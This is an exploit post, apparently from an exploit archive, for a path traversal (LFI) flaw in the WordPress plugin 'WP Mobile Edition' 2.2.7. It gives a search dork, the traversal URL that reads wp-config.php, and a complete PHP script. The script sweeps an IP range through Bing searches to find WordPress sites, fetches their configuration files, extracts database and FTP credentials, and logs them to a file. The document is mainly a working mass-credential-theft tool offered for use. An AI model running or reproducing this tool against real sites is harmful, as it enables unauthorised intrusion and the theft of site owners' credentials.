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WP Mobile Edition Wordpress Plugin - LFI Vulnerability
###################################################################################### # Exploit Title: Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability # # Date: june 6, 2015 # # Exploit Author: ViRuS OS # # Google Dork: inurl:?fdx_switcher=mobile # # Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/ # # Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip # # Version: WP Mobile Edition Version 2.2.7 # # Tested on : windows # ###################################################################################### Description : Wordpress Plugin 'WP Mobile Edition' is not filtering data so we can get the configration file in the path < site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php> # Exploite Code : <?php //ViRuS OS set_time_limit(0); error_reporting(0); echo "############### Fdx_Switcher MiniBot By ip Range ##################\n\n"; print " Coded By _ __ _(_)_ __ _ _ ___ ___ ___ \ \ / / | '__| | | / __| / _ \/ __| \ V /| | | | |_| \__ \ | (_) \__ \ \_/ |_|_| \__,_|___/ \___/|___/ Greets >> CoderLeeT | Fallag Gassrini | Taz| S4hk | Sir Matrix | Kuroi'SH "; echo "Follow Me On FaceBook : https://www.facebook.com/VirusXOS\n\n"; echo "Follow Me On FaceBook : https://www.facebook.com/Weka.Mashkel007\n\n"; echo "#################### Welcome Master ViRuS OS ################\n\n"; echo "Server Target IP : "; $ip=trim(fgets(STDIN,1024)); $ip = explode('.',$ip); $ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.'; for($i=0;$i <= 255;$i++) { $sites = array_map("site", bing("ip:$ip.$i wordpress")); $un=array_unique($sites); echo "[+] Scanning -> ", $ip.$i, ""."\n"; echo "Found : ".count($sites)." sites\n\n"; foreach($un as $pok){ $host=findit($file,"DB_HOST', '","');"); $db=findit($file,"DB_NAME', '","');"); $us=findit($file,"DB_USER', '","');"); $pw=findit($file,"DB_PASSWORD', '","');"); $bda="http://$pok"; $linkof='/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'; $dn=($bda).($linkof); $file=@file_get_contents($dn); if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){ echo "[+] Scanning => ".$bda."\n\n"; echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n"; echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n"; echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n"; echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n"; $db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n"; $user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n"; $pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n"; $host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n"; $ux = "".$bda."\r\n"; $ux1 = "".$db."\r\n"; $ux2 = "".$user."\r\n"; $ux3 = "".$pass."\r\n"; $ux4 = "".$host."\r\n"; $save=fopen('exploited.txt','ab'); fwrite($save,"$ux"); fwrite($save,"$ux1"); fwrite($save,"$ux2"); fwrite($save,"$ux3"); fwrite($save,"$ux4"); } elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){ echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n"; echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n"; echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n"; } else{echo $bda." : Exploit failed \n\n";} } } function findit($mytext,$starttag,$endtag) { $posLeft = stripos($mytext,$starttag)+strlen($starttag); $posRight = stripos($mytext,$endtag,$posLeft+1); return substr($mytext,$posLeft,$posRight-$posLeft); } function site($link){ return str_replace("","",parse_url($link, PHP_URL_HOST)); } function bing($what){ for($i = 1; $i <= 2000; $i += 10){ $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE"); curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)"); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt'); curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt'); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); $data = curl_exec($ch); preg_match_all('#;a=(.*?)" h="#',$data, $links); foreach($links[1] as $link){ $allLinks[] = $link; } if(!preg_match('#"sw_next"#',$data)) break; } if(!empty($allLinks) && is_array($allLinks)){ return array_unique(array_map("urldecode", $allLinks)); } } ?> # 0day.today [2024-12-26] #